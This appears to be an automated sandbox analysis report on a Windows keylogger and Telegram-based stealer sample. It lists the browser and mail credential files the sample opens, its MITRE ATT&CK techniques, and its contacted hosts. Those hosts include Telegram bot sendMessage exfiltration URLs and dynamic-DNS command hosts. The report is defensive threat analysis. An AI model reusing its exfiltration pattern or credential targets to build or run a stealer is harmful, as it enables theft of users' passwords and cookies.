          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2500, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2500, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2500, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Obfuscated Files or Information          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          PowerShell          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		1
          Software Packing          		LSASS Memory14
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
          Process Injection          		1
          DLL Side-Loading          		Security Account Manager11
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		11
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Masquerading          		NTDS1
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
          Virtualization/Sandbox Evasion          		LSA Secrets21
          Virtualization/Sandbox Evasion          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559209 Sample: #U5ba2#U6237#U9000#U6b3e#U7... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 4 other IPs or domains 2->28 36 Found malware configuration 2->36 38 Multi AV Scanner detection for dropped file 2->38 40 Multi AV Scanner detection for submitted file 2->40 46 4 other signatures 2->46 8 #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe 1 20 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 process5 10 powershell.exe 28 8->10         started        file6 20 #U5ba2#U6237#U9000...ERLEON NOVIEMBR.exe, PE32 10->20 dropped 22 #U5ba2#U6237#U9000...exe:Zone.Identifier, ASCII 10->22 dropped 48 Early bird code injection technique detected 10->48 50 Writes to foreign memory regions 10->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 10->52 54 3 other signatures 10->54 14 msiexec.exe 15 8 10->14         started        18 conhost.exe 10->18         started        signatures7 process8 dnsIp9 30 api.telegram.org 149.154.167.220, 443, 49985 TELEGRAMRU United Kingdom 14->30 32 checkip.dyndns.com 193.122.130.0, 49973, 49976, 49978 ORACLE-BMC-31898US United States 14->32 34 3 other IPs or domains 14->34 56 Tries to steal Mail credentials (via file / registry access) 14->56 58 Tries to harvest and steal browser information (history, passwords, etc) 14->58 signatures10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe16%ReversingLabs

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe16%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          		172.217.23.110
          		truefalse
            		high
            drive.usercontent.google.com
            		142.250.186.33
            		truefalse
              		high
              reallyfreegeoip.org
              		188.114.96.3
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		193.122.130.0
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.75false
                        		high
                        http://checkip.dyndns.org/false
                          		high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:33:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/msiexec.exe, 0000000E.00000002.2542418088.000000002335B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002334C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtabmsiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.office.com/Xmsiexec.exe, 0000000E.00000002.2542418088.000000002334C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orgmsiexec.exe, 0000000E.00000002.2542418088.0000000023285000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2036575902.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botmsiexec.exe, 0000000E.00000002.2542418088.0000000023285000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2036575902.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.office.com/lBmsiexec.exe, 0000000E.00000002.2542418088.0000000023356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.usercontent.google.com/msiexec.exe, 0000000E.00000002.2530341209.00000000076BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2198114820.00000000076D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://checkip.dyndns.orgmsiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://nsis.sf.net/NSIS_ErrorError#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe, #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe.2.drfalse
                                                                		high
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 0000000E.00000002.2542418088.0000000023285000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://chrome.google.com/webstore?hl=enmsiexec.exe, 0000000E.00000002.2542418088.000000002332A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002331B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://varders.kozow.com:8081msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2036575902.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.google.com/d8msiexec.exe, 0000000E.00000002.2530341209.000000000765A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://aborters.duckdns.org:8081msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ac.ecosia.org/autocomplete?q=msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.commsiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2036575902.0000000004881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://drive.google.com/msiexec.exe, 0000000E.00000002.2530341209.000000000765A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://anotherarmy.dns.army:8081msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://reallyfreegeoip.org/xml/8.46.123.75$msiexec.exe, 0000000E.00000002.2542418088.0000000023214000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002325A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://contoso.com/powershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 0000000E.00000002.2542418088.0000000023325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://reallyfreegeoip.orgmsiexec.exe, 0000000E.00000002.2542418088.00000000231EA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002325A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://apis.google.commsiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2036575902.0000000004881000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://chrome.google.com/webstore?hl=enXmsiexec.exe, 0000000E.00000002.2542418088.000000002331B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20amsiexec.exe, 0000000E.00000002.2542418088.0000000023285000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://reallyfreegeoip.org/xml/msiexec.exe, 0000000E.00000002.2542418088.00000000231EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                172.217.23.110
                                                                                                                		drive.google.comUnited States
                                                                                                                		15169GOOGLEUSfalse
                                                                                                                149.154.167.220
                                                                                                                		api.telegram.orgUnited Kingdom
                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                188.114.96.3
                                                                                                                		reallyfreegeoip.orgEuropean Union
                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                193.122.130.0
                                                                                                                		checkip.dyndns.comUnited States
                                                                                                                		31898ORACLE-BMC-31898USfalse
                                                                                                                142.250.186.33
                                                                                                                		drive.usercontent.google.comUnited States
                                                                                                                		15169GOOGLEUSfalse

                                                                                                                General Information

                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1559209
                                                                                                                Start date and time:2024-11-20 10:08:11 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 7m 18s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:17
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                renamed because original name is a hash value
                                                                                                                Original Sample Name:-SUPERLEON NOVIEMBR.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@6/13@5/5
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 33.3%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 96%
                                                                                                                • Number of executed functions: 132
                                                                                                                • Number of non-executed functions: 52
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target msiexec.exe, PID 2500 because it is empty
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6880 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • VT rate limit hit for: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                04:09:05API Interceptor35x Sleep call for process: powershell.exe modified
                                                                                                                05:47:50API Interceptor168x Sleep call for process: msiexec.exe modified

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                149.154.167.220BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                          Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                              INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    188.114.96.3A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.mydreamdeal.click/1ag2/
                                                                                                                                    SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.questmatch.pro/ipd6/
                                                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                                                    need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.rtpwslot888gol.sbs/jmkz/
                                                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                                                    http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                    • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                                    QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • filetransfer.io/data-package/7pdXjNKP/download
                                                                                                                                    gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • go.glarysoft.com/g/t/releasenotes/cn/10000/s/Glary%20Utilities/v/6.16.0.20

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    reallyfreegeoip.orgBOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 188.114.97.3
                                                                                                                                    e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 188.114.97.3
                                                                                                                                    REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 188.114.97.3
                                                                                                                                    Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    checkip.dyndns.comBOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 193.122.130.0
                                                                                                                                    REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 193.122.130.0
